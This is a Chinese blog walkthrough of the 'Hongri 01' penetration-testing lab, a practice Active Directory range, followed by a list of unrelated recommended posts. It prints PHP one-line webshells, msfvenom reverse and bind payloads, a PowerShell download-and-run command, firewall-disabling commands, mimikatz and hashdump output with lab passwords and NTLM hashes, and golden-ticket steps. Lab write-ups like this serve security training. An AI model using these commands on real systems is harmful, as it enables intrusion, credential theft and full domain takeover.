红日靶场01

O、 环境搭建

拓扑图

kali     192.168.150.128
vm1     192.168.52.143  192.168.150.152
vm2     192.168.52.141
vm3(域控)     192.168.52.138

可以参考 红日靶场配置

一、 vm1

1. 信息收集

0. phpStudy 探针

1. 端口扫描

nmap 192.168.150.152 -sT -Pn

80 web服务

2. 目录扫描

dirsearch.py

发现phpmyadmin

此处存在 弱口令 root root ，可尝试写马

不知道为什么用 BP 爆破root的返回包和错误密码结果一样

此处还有其实 beifen.rar 奈何信息收集能力太弱

访问http://192.168.150.152/beifen.rar

下载网站备份

3. 网站源码寻找信息

网站路径一清二楚码

访问验证,存在，点击登录

根据源码显示，访问后台

寻找数据库文件(找账号密码)

发现配置文件

1)进后台方法一

在网站首页的公告存在默认账号密码

进入后台

2）进后台方法二(失败)

发现可疑账号密码

寻找后台登录函数，密码加密函数

好像不可逆qwq

4. getshell

方法一：后台模板插马

百度搜索yxcms相关漏洞

插入一句话木马

<?php @eval($_POST['cmd']);?>

菜刀连接

方法二：phpmyadmin

1. outfile

找绝对路径

查看数据库路径

show global variables like "%datadir%";

C:\phpStudy\MySQL\data\

在浏览器查看路径时发现含有绝对路径报错

select '<?php @eval($_POST[1])?>' into outfile 'C:\phpStudy\WWW\yxcms\web.php'

--secure-file-priv选项无法写入

2. 日志写马

select user();

查看日志配置

show variables like 'general%';

来到变量处，修改general log 和 general log file 的值

set global general_log="ON";
set global general_log_file="C:/phpStudy/WWW/shell.php"

配置修改成功

一句话木马会被记录在日志中，从而getshell

select "<?php @eval($_POST['cmd']);?>";

5. 建立msf会话

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.128 lport=2223 -f exe > /root/shell.exe

上传

运行 shell.exe

成功建立

6. 爆破hash

迁移进程 migrate

加载 mimikatz, load mimikatz

load kiwi

creds_all 列举所有凭据

creds_kerberos 列举所有kerberos凭据

meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  !@#QWE123
stu1$          GOD.ORG  d1 28 eb 7d 4e 3d a9 f9 45 1d dd b8 11 4f ac 62 e0 72 bd fc e7 9d 31 e6 c5 d1 3f 97 f8 47 ca ed 31 85 02 17 b4 58 52 be 3e 73 72 fd cf 8b af 9c 15 7c 92 7a 3d dc 1c fd 24 8f 50 aa 3a ed ce 58 8f 39 8a a9 4e 67 68 0c c3 f8 b1 ae 91 45 83 07 be 30 e7 45 5c 68 54 fa 28 5a 8c da 54 5e 44 a7 57 ee bf 83 55 fd 6a cd 74 f6 d7 f9 4f 7a 37 1c 25 31 bd f0 0f ca 09 13 e7 56 5c 14 7c f8 03 25 03 49 93 d0 06 ea 47 4c 06 f2 d3 4a 48 46 c2 75 3f 79 08 64 a1 7c 23 f6 7b 81 1f e2 91 20 97 1a a6 b3 b0 3c c9 f5 62 9c 05 47 9a aa a3 0d 44 57 7e 0f 22 6f a7 f6 56 3f ea 21 00 7e 19 87 e1 57 9d 37 c0 f8 96 60 25 c1 f3 b9 ce 9b 8c 5f de 90 61 1c 3b f7 2a d5 1d 81 cc 98 95 60 73 a0 fe be ba a4 17 4e bf e7 5b 26 2b 06 61 9a b7 8e a9 e7

存在域GOD.ORG

Administrator !@#QWE123

上传mimikatz

kerberos::list

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2021/9/29 17:27:43 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : krbtgt/GOD.ORG @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;

[00000001] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2021/9/29 17:09:40 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : krbtgt/GOD.ORG @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;

[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/29 17:20:17 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : cifs/owa.god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/29 17:09:40 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : ldap/owa.god.org/god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/27 20:13:31 ; 2021/9/28 6:03:09 ; 2021/10/4 20:03:09
Server Name : ldap/owa.god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/27 20:03:16 ; 2021/9/28 6:03:09 ; 2021/10/4 20:03:09
Server Name : STU1$ @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a00000 : pre_authent ; renewable ; forwardable ;

sid

C:\Windows\system32>whoami/user
whoami/user
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500

7. 远程桌面连接

run post/windows/manage/enable_rdp

rdesktop 192.168.150.152

进去 关闭防火墙 和 defender

二、 收集域内信息

1. 建立路由,配置代理

建立路由

run autoroute -s 192.168.52.0

查看

run autoroute -p

配置代理

修改 配置文件proxychains4.conf

坑：

└─# proxychains nmap 192.168.52.143 -sT 134 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 10:30 CST
nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion `rc == 0’ failed.
zsh: abort proxychains nmap 192.168.52.143 -sT

解决方法：

在 proxychains4.conf 中关闭dns代理

即 在proxydns 前加#

2. 内网扫描

0）收集跳板机信息

查看安装应用

run post/windows/gather/enum_applications

列举当前登陆过的用户

 run post/windows/gather/enum_logged_on_users

定位域控

run post/windows/gather/enum_domain

域内所有机器

run post/windows/gather/enum_ad_computers

​

1）主机探活

use auxiliary/scanner/netbios/nbname
set rhosts 192.168.52.0/24
set threads 30
run

可以在shell中用 ping扫描探测主机存活

for /l %i in (1,1,255) do @ping 192.168.52.%i -w 1 -n 1|find /i "ttl="

proxychains nbtscan -r 192.168.52.0/24

进入shell查看域控主机

nltest /dsgetdc:GOD

VM2: 192.168.52.143

DC: 192.168.52.141

3. 端口扫描

proxychains nmap 192.168.52.143 -sT -Pn

psexec.exe \\192.168.52.141 -u god\administrator -p !@#QWE123 cmd

4. 脚本扫描

可在 win7 的远程桌面执行
扫描是否存在常规漏洞

nmap --script==vuln 192.168.52.138

三、兰德里的折磨（失败的尝试）

1. 永恒之蓝

auxiliary/scanner/smb/smb_ms17_010

淦淦看

exploit/windows/smb/ms17_010_eternalblue

只设置rhosts，run：

Exploit completed, but no session was created.

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

还把session Died了

嗯…热带风味

利用 ms17_010_command 关闭防火墙

尝试 exploit/windows/smb/ms17_010_psexec

Exploit completed, but no session was created

session Died + 1

MS08-067 失败

scanner/smb/smb_login)

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

windows/dcerpc/ms03_026_dcom 失败

2. 域hash传递攻击

上传pexec.exe 到win7

psexec.exe \\192.168.52.141 -u god\administrator -p !@#QWE123 cmd

报错记得开启(需要重启)

exploit/windows/smb/ms17_010_psexec

添加rhosts ，run

Exploit completed, but no session was created.

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

session Died + 1

四、 苦尽甘来

发现 ms17_010_command 能成功执行

1. 远程桌面连接

关闭防火墙

netsh firewall set opmode disable"

防火墙添加规则 开放3389（可跳过这一步直接开启远程桌面）

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

尝试关闭防火墙或添加规则，(有时候)Died

开启远程桌面连接

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

set command wmic RDTOGGLE WHERE ServerName=\'%COMPUTERNAME%\' call SetAllowTSConnections 1
//设置时特殊字符需要转义

2. 传马建立MSF连接

在win7中上传正向马到网站目录下

msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe > /root/d.exe

利用ms17_010_command 的远程命令执行漏洞

尝试 用cmd命令下载 d.exe (特殊字符需要转义)

powershell (new-object Net.WebClient).DownloadFile(\'http://192.168.52.143/yxcms/d.exe\',\'C:\\1.exe\')

正向连接

cmd 运行 木马

成功连接

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58e91a5ac358d86513ab224312314061:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
ligang:1106:aad3b435b51404eeaad3b435b51404ee:1e3d22f88dfd250c9312d21686c60f41:::
OWA : 1001 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : 10 a d 10 a b 6 e 0 b 77 f e 984 d 8 c 26 c 24 d a f 99 : : : R O O T − T V I 862 U B E H :1001:aad3b435b51404eeaad3b435b51404ee:10ad10ab6e0b77fe984d8c26c24daf99::: ROOT-TVI862UBEH :1001:aad3b435b51404eeaad3b435b51404ee:10ad10ab6e0b77fe984d8c26c24daf99:::ROOT−TVI862UBEH:1104:aad3b435b51404eeaad3b435b51404ee:ba204b87ef6afa59677cb033b7f9e98f:::
STU1 : 1105 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : c 277 d c 0 a 07323 b e e 138 f b 6 c 5 c 859 b 823 : : : D E V 1 :1105:aad3b435b51404eeaad3b435b51404ee:c277dc0a07323bee138fb6c5c859b823::: DEV1 :1105:aad3b435b51404eeaad3b435b51404ee:c277dc0a07323bee138fb6c5c859b823:::DEV1:1107:aad3b435b51404eeaad3b435b51404ee:bed18e5b9d13bb384a3041a10d43c01b:::

五、 制作黄金票据

黄金票据的条件要求：
1.域名称 hacker.com
2.域的SID 值 S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

进入dc 会话

迁移进程 加载mimikatz、 kiwi

窃取管理员权限

steal_token pid

执行命令获取制作黄金票据所需信息(sys权限无法执行改命令)

dcsync_ntlm krbtgt

meterpreter > dcsync_ntlm krbtgt
[+] Account : krbtgt
[+] NTLM Hash : 58e91a5ac358d86513ab224312314061
[+] LM Hash : a151f0fbafab56da67864278a60a75e8
[+] SID : S-1-5-21-2952760202-1353902439-2381784089-502
[+] RID : 502

在 dc 会话中制作黄金票据

golden_ticket_create -d god.org -u gui -s S-1-5-21-2952760202-1353902439-2381784089 -k 58e91a5ac358d86513ab224312314061 -t /home/kali/Desktop/hongri.ticket

进入win7会话

win7 无法访问 dc

在sessions 中加载黄金票据

kerberos_ticket_use /home/kali/Desktop/hongri.ticket

进入 shell 再次访问

进入win7会话

win7 无法访问 dc

在sessions 中加载黄金票据

kerberos_ticket_use /home/kali/Desktop/hongri.ticket

进入 shell 再次访问

《关于我不自量力挑战红日靶场01却被虐的不成人样的那档事》相关推荐

1. ComeFuture英伽学院——2020年 全国大学生英语竞赛【C类初赛真题解析】(持续更新)

   视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...

2. ComeFuture英伽学院——2019年 全国大学生英语竞赛【C类初赛真题解析】大小作文——详细解析

   视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...

3. 信息学奥赛真题解析（玩具谜题）

   玩具谜题(2016年信息学奥赛提高组真题) 题目描述 小南有一套可爱的玩具小人, 它们各有不同的职业.有一天, 这些玩具小人把小南的眼镜藏了起来.小南发现玩具小人们围成了一个圈,它们有的面朝圈内,有的 ...

4. 信息学奥赛之初赛 第1轮 讲解（01-08课）

   信息学奥赛之初赛讲解 01 计算机概述 系统基本结构 信息学奥赛之初赛讲解 01 计算机概述 系统基本结构_哔哩哔哩_bilibili 信息学奥赛之初赛讲解 02 软件系统 计算机语言 进制转换 信息 ...

5. 信息学奥赛一本通习题答案（五）

   最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...

6. 信息学奥赛一本通习题答案（三）

   最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...

7. 信息学奥赛一本通 提高篇 第六部分 数学基础 相关的真题

   第1章   快速幂 1875:[13NOIP提高组]转圈游戏 信息学奥赛一本通(C++版)在线评测系统 第2 章  素数 第 3 章  约数 第 4 章  同余问题 第 5 章  矩阵乘法 第 6 章 ...

8. 信息学奥赛一本通题目代码（非题库）

   为了完善自己学c++,很多人都去读相关文献,就比如<信息学奥赛一本通>,可又对题目无从下手,从今天开始,我将把书上的题目一 一的解析下来,可以做参考,如果有错,可以告诉我,将在下次解析里重 ...

9. 信息学奥赛一本通（C++版） 刷题 记录

   总目录详见:https://blog.csdn.net/mrcrack/article/details/86501716 信息学奥赛一本通(C++版) 刷题 记录 http://ybt.ssoier. ...

10. 最近公共祖先三种算法详解 + 模板题 建议新手收藏 例题： 信息学奥赛一本通 祖孙询问 距离

    首先什么是最近公共祖先?? 如图:红色节点的祖先为红色的1, 2, 3. 绿色节点的祖先为绿色的1, 2, 3, 4. 他们的最近公共祖先即他们最先相交的地方,如在上图中黄色的点就是他们的最近公共祖先 ...

最新文章

1. SqlServer2008查询性能优化_第一章
2. 一个数里有那些约数用c++怎么做_嵌入式就业的那些事~
3. C++ STL之vector常用方法
4. 如何用python完成评分功能呢_从文件python进行单词分析和评分
5. CFUpdate上传控件的使用
6. 一句话输出没有结束符的字符串
7. Mysql中Drop删除用户的名字_mysql5.5 使用drop删除用户
8. oracle多线程删除,请教高手：多线程访问时如何实现删除一个文件？
9. 聚焦国内名企开源！OSCAR 开源先锋日（1020）全部议程首次曝光
10. 380天！理想汽车交付量突破30000辆
11. 深入理解jQuery插件开发(讲解jQuery开发的好文)
12. Pisces-ORM的思考与设计
13. win10虚拟机管理服务器,如何使用微软的虚拟机管理器来管理Hyper-V虚拟机
14. 一则“孔乙己文学”，刺痛了多少学子的心？
15. 深度残差网络RESNET
16. Inception模块
17. 基于LVS高可用架构实现Nginx集群分流
18. java_剪刀包袱锤
19. UI设计的7大就业方向，你应该成为什么样的人才？
20. wow服务器硬件,《魔兽世界》硬件全面升级4月26日开始

热门文章

1. 重新定义公司，一点体会
2. VS-code出现注释乱码以及VS调试过程中出现汉字乱码问题
3. Hadoop运维工程师专家之路--第二章Hadoop架构简介
4. html中特殊字符的代码
5. c语言程序设计樱花,Qt实现樱花飞舞效果
6. 店铺被判定虚假交易的原因分析，店铺因为虚假交易降权怎么办，如何减小店铺的影响
7. 揭秘：小米和乐视撕逼的真实目的
8. 哈佛H8、比亚迪S7、传祺GS8、长安CS95发动机横评对比
9. python open写入_【Python】使用with open读写文件时，文件不存在没有自动创建
10. 为什么坚持用iPod？没有比它更好的赏乐方式了